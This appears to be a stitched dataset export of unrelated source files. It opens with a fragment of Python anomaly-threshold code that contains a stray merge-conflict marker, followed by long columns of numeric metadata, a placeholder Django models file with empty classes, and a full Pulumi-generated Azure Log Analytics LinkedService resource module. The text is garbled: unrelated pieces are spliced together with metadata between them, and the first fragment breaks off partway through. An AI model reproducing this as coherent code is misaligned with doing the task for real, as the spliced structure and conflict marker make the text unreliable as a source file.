score = np.where(np.isnan(score), np.nanmin(score) - sys.float_info.epsilon, score)
return np.where(score >= threshold, 1, 0)
def threshold(self, score):
return np.nanmean(score) + 2 * np.nanstd(score)
>>>>>>> upstream/master
| 45.920569
| 120
| 0.597003
| 7,057
| 54,921
| 4.468471
| 0.074536
| 0.010275
| 0.003805
| 0.009133
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0.999429
| 0
| 0.009893
| 0.28592
| 54,921
| 1,195
| 121
| 45.958996
| 0.794176
| 0.055006
| 0
| 0.994975
| 0
| 0.00402
| 0.119693
| 0.031296
| 0
| 0
| 0
| 0
| 0.01005
| 0
| null | null | 0.00201
| 0.046231
| null | null | 0.024121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0736d4d113f112a1fe5974c6d2a7f844c8f407d2
| 160
|
py
|
Python
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2019-04-20T16:58:02.000Z
|
2019-04-20T16:58:02.000Z
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 6
|
2020-06-05T19:57:58.000Z
|
2021-09-08T00:49:17.000Z
|
apps/store/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2021-09-10T18:29:28.000Z
|
2021-09-10T18:29:28.000Z
|
from django.db import models
class StoreManage(models.Model):
    """Store-management model — placeholder, no fields defined yet."""
    pass
class StoreCategory(models.Model):
    """Store-category model — placeholder, no fields defined yet."""
    pass
class Activate(models.Model):
    """Activation model — placeholder, no fields defined yet."""
    pass
| 11.428571
| 34
| 0.725
| 20
| 160
| 5.8
| 0.55
| 0.284483
| 0.387931
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19375
| 160
| 13
| 35
| 12.307692
| 0.899225
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
076873caae99de202f9a8eeccf536a330dc8f471
| 33,739
|
py
|
Python
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/loganalytics/linked_service.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LinkedServiceArgs', 'LinkedService']
# NOTE(review): tfgen-generated code (see the warning at the top of this file) —
# manual changes here are overwritten on regeneration; fix the provider schema instead.
@pulumi.input_type
class LinkedServiceArgs:
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 linked_service_name: Optional[pulumi.Input[str]] = None,
                 read_access_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workspace_id: Optional[pulumi.Input[str]] = None,
                 workspace_name: Optional[pulumi.Input[str]] = None,
                 write_access_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a LinkedService resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Deprecated inputs first emit warnings, then are stored if provided
        if linked_service_name is not None:
            warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
        if linked_service_name is not None:
            pulumi.set(__self__, "linked_service_name", linked_service_name)
        if read_access_id is not None:
            pulumi.set(__self__, "read_access_id", read_access_id)
        if resource_id is not None:
            warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
        if resource_id is not None:
            pulumi.set(__self__, "resource_id", resource_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if workspace_id is not None:
            pulumi.set(__self__, "workspace_id", workspace_id)
        if workspace_name is not None:
            warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
        if workspace_name is not None:
            pulumi.set(__self__, "workspace_name", workspace_name)
        if write_access_id is not None:
            pulumi.set(__self__, "write_access_id", write_access_id)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="linkedServiceName")
    def linked_service_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "linked_service_name")

    @linked_service_name.setter
    def linked_service_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "linked_service_name", value)

    @property
    @pulumi.getter(name="readAccessId")
    def read_access_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "read_access_id")

    @read_access_id.setter
    def read_access_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "read_access_id", value)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="workspaceId")
    def workspace_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_id")

    @workspace_id.setter
    def workspace_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workspace_id", value)

    @property
    @pulumi.getter(name="workspaceName")
    def workspace_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_name")

    @workspace_name.setter
    def workspace_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workspace_name", value)

    @property
    @pulumi.getter(name="writeAccessId")
    def write_access_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        return pulumi.get(self, "write_access_id")

    @write_access_id.setter
    def write_access_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "write_access_id", value)
@pulumi.input_type
class _LinkedServiceState:
    """Input type holding the full (post-provisioning) state of a LinkedService,
    used by ``LinkedService.get`` to look up and filter existing resources."""

    def __init__(__self__, *,
                 linked_service_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 read_access_id: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workspace_id: Optional[pulumi.Input[str]] = None,
                 workspace_name: Optional[pulumi.Input[str]] = None,
                 write_access_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering LinkedService resources.
        :param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
        :param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        # Deprecated input: emit the warning, then store the value as usual.
        if linked_service_name is not None:
            warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
        if linked_service_name is not None:
            pulumi.set(__self__, "linked_service_name", linked_service_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if read_access_id is not None:
            pulumi.set(__self__, "read_access_id", read_access_id)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Deprecated input: superseded by `read_access_id`.
        if resource_id is not None:
            warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
        if resource_id is not None:
            pulumi.set(__self__, "resource_id", resource_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if workspace_id is not None:
            pulumi.set(__self__, "workspace_id", workspace_id)
        # Deprecated input: superseded by `workspace_id`.
        if workspace_name is not None:
            warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
            pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
        if workspace_name is not None:
            pulumi.set(__self__, "workspace_name", workspace_name)
        if write_access_id is not None:
            pulumi.set(__self__, "write_access_id", write_access_id)

    @property
    @pulumi.getter(name="linkedServiceName")
    def linked_service_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "linked_service_name")

    @linked_service_name.setter
    def linked_service_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "linked_service_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="readAccessId")
    def read_access_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "read_access_id")

    @read_access_id.setter
    def read_access_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "read_access_id", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="workspaceId")
    def workspace_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_id")

    @workspace_id.setter
    def workspace_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workspace_id", value)

    @property
    @pulumi.getter(name="workspaceName")
    def workspace_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_name")

    @workspace_name.setter
    def workspace_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workspace_name", value)

    @property
    @pulumi.getter(name="writeAccessId")
    def write_access_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        return pulumi.get(self, "write_access_id")

    @write_access_id.setter
    def write_access_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "write_access_id", value)
class LinkedService(pulumi.CustomResource):
    """Manages an Azure Log Analytics Linked Service
    (type token ``azure:loganalytics/linkedService:LinkedService``)."""

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 linked_service_name: Optional[pulumi.Input[str]] = None,
                 read_access_id: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workspace_id: Optional[pulumi.Input[str]] = None,
                 workspace_name: Optional[pulumi.Input[str]] = None,
                 write_access_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Log Analytics Linked Service.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.automation.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="Basic",
            tags={
                "environment": "development",
            })
        example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku="PerGB2018",
            retention_in_days=30)
        example_linked_service = azure.loganalytics.LinkedService("exampleLinkedService",
            resource_group_name=example_resource_group.name,
            workspace_id=example_analytics_workspace.id,
            read_access_id=example_account.id)
        ```

        ## Import

        Log Analytics Workspaces can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:loganalytics/linkedService:LinkedService example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.OperationalInsights/workspaces/workspace1/linkedServices/Automation
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: LinkedServiceArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Log Analytics Linked Service.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.automation.Account("exampleAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku_name="Basic",
            tags={
                "environment": "development",
            })
        example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku="PerGB2018",
            retention_in_days=30)
        example_linked_service = azure.loganalytics.LinkedService("exampleLinkedService",
            resource_group_name=example_resource_group.name,
            workspace_id=example_analytics_workspace.id,
            read_access_id=example_account.id)
        ```

        ## Import

        Log Analytics Workspaces can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:loganalytics/linkedService:LinkedService example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.OperationalInsights/workspaces/workspace1/linkedServices/Automation
        ```

        :param str resource_name: The name of the resource.
        :param LinkedServiceArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either an args object plus
        # options, or the flattened keyword-argument form.
        resource_args, opts = _utilities.get_resource_args_opts(LinkedServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       linked_service_name: Optional[pulumi.Input[str]] = None,
                       read_access_id: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       resource_id: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       workspace_id: Optional[pulumi.Input[str]] = None,
                       workspace_name: Optional[pulumi.Input[str]] = None,
                       write_access_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: validates the
        # options, builds the property bag, and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means "adopt an existing resource" — the property bag is
        # then supplied via __props__ by LinkedService.get() instead of here.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = LinkedServiceArgs.__new__(LinkedServiceArgs)

            # Deprecation warnings are suppressed when rehydrating by URN.
            if linked_service_name is not None and not opts.urn:
                warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
                pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
            __props__.__dict__["linked_service_name"] = linked_service_name
            __props__.__dict__["read_access_id"] = read_access_id
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if resource_id is not None and not opts.urn:
                warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
                pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
            __props__.__dict__["resource_id"] = resource_id
            __props__.__dict__["tags"] = tags
            __props__.__dict__["workspace_id"] = workspace_id
            if workspace_name is not None and not opts.urn:
                warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
                pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
            __props__.__dict__["workspace_name"] = workspace_name
            __props__.__dict__["write_access_id"] = write_access_id
            # `name` is an output computed by the provider, never an input.
            __props__.__dict__["name"] = None
        super(LinkedService, __self__).__init__(
            'azure:loganalytics/linkedService:LinkedService',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            linked_service_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            read_access_id: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            resource_id: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            workspace_id: Optional[pulumi.Input[str]] = None,
            workspace_name: Optional[pulumi.Input[str]] = None,
            write_access_id: Optional[pulumi.Input[str]] = None) -> 'LinkedService':
        """
        Get an existing LinkedService resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
        :param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        :param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        # Merging id into opts routes _internal_init down its "existing
        # resource" path, with this state object as the property bag.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _LinkedServiceState.__new__(_LinkedServiceState)

        __props__.__dict__["linked_service_name"] = linked_service_name
        __props__.__dict__["name"] = name
        __props__.__dict__["read_access_id"] = read_access_id
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["resource_id"] = resource_id
        __props__.__dict__["tags"] = tags
        __props__.__dict__["workspace_id"] = workspace_id
        __props__.__dict__["workspace_name"] = workspace_name
        __props__.__dict__["write_access_id"] = write_access_id
        return LinkedService(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="linkedServiceName")
    def linked_service_name(self) -> pulumi.Output[str]:
        """
        Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "linked_service_name")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="readAccessId")
    def read_access_id(self) -> pulumi.Output[str]:
        """
        The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "read_access_id")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> pulumi.Output[str]:
        """
        The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
        """
        return pulumi.get(self, "resource_id")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="workspaceId")
    def workspace_id(self) -> pulumi.Output[str]:
        """
        The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_id")

    @property
    @pulumi.getter(name="workspaceName")
    def workspace_name(self) -> pulumi.Output[str]:
        """
        The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "workspace_name")

    @property
    @pulumi.getter(name="writeAccessId")
    def write_access_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
        """
        return pulumi.get(self, "write_access_id")
| 56.325543
| 293
| 0.686327
| 4,371
| 33,739
| 5.111187
| 0.049188
| 0.062531
| 0.070185
| 0.063023
| 0.922251
| 0.914194
| 0.909359
| 0.902466
| 0.897856
| 0.886576
| 0
| 0.003418
| 0.228282
| 33,739
| 598
| 294
| 56.419732
| 0.85463
| 0.401909
| 0
| 0.796407
| 1
| 0.035928
| 0.20015
| 0.003586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149701
| false
| 0.002994
| 0.01497
| 0
| 0.254491
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4aebde625d398be9bb422562d27de505cb67b625
| 15,872
|
py
|
Python
|
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | 2
|
2021-03-26T18:19:57.000Z
|
